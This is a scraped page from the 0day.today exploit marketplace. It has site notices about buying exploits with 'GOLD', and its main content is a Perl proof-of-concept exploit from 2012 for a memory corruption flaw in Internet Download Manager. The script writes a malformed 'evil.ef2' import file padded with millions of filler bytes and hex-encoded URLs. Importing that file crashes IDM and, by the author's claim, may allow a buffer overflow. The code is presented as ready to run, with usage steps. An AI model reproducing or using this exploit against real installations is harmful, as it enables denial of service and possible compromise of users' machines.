0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Internet Download Manager All Versions - Memory Corruption Vulnerability
#!/usr/bin/perl # 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 # 0 _ __ __ __ 1 # 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 # 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 # 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 # 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 # 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 # 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 # 1 \ \____/ >> Exploit database separated by exploit 0 # 0 \/___/ type (local, remote, DoS, etc.) 1 # 1 1 # 0 [x] Official Website: http://www.1337day.com 0 # 1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1 # 0 0 # 1 ========================================== 1 # 0 I'm Dark-Puzzle From Inj3ct0r TEAM 0 # 0 1 # 1 dark-puzzle[at]live[at]fr 0 # 0 ========================================== 1 # 1 White Hat 1 # 0 Independant Pentester 0 # 1 exploit coder/bug researcher 0 # 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1 # Title : Internet Download Manager All Versions - Memory Corruption Vulnerability . # Author : Dark-Puzzle (Souhail Hammou) # Type : Local # Risk : Critical # Vendor : Tonec Inc. # Versions : All versions supporting the IDM file importation are Vulnerable . # Tested On : Windows XP Service Pack 2 FR 32-bits , Windows 7 FR 64-bits # Date : 31 August 2012 # Gr337ings to : Inj3ct0r Team - Packetstormsecurity.org - Securityfocus.com - Jigsaw - Dark-Soldier ... #Vulnerability Details : Work your skills & imagination . #Usage : Copy this script to memorycorruption.pl #Execute : perl memorycorruption.pl #Howto : Go to Tasks ---> Import ---> From IDM export file ---> evil.ef2 (executing file as .eif may also work ) # Taches --> Importer -> Depuis un fichier IDM ---> evil.ef2 my $hd = "\x3c\n"; my $ed = "\x3e\n"; my $ht = "\x68\x74\x74\x70\x3a\x2f\x2f"; my $lk = "\x77\x77\x77\x2e\x31\x33\x33\x37\x64\x61\x79\x2e\x63\x6f\x6d\x2f\x65\x78\x70\x6c\x6f\x69\x74\x73\x2f\x31\x39\x32\x31\x31\n"; my $fake ="\x2e\x63\x6f\x6d\x2f\x64\x61\x72\x6b\x70\x75\x7a\x7a\x6c\x65\x2e\x74\x78\x74\n"; my $txt = "\x41" x 2000000; my $stx = "\x42" x 400000 ; my $null = "\x00\x00"; # Not Necessary , but maybe more effective . # Sorry Script Kiddies ... # BOF is possible and every failed attempt will cause a Denial of Service Vulnerability . my $file = "evil.ef2"; open ($File, ">$file"); print $File $hd.$ht.$lk.$ed.$hd.$ht.$txt.$stx.$fake.$ed; close ($File); print " Exploit By Dark-Puzzle \n" ; print " Creating Evil File , Please Wait ...\n\n\n"; sleep (5); print " Evil File Created Successfully , Happy Hunting :)\n"; # Datasec Team . # 0day.today [2024-10-05] #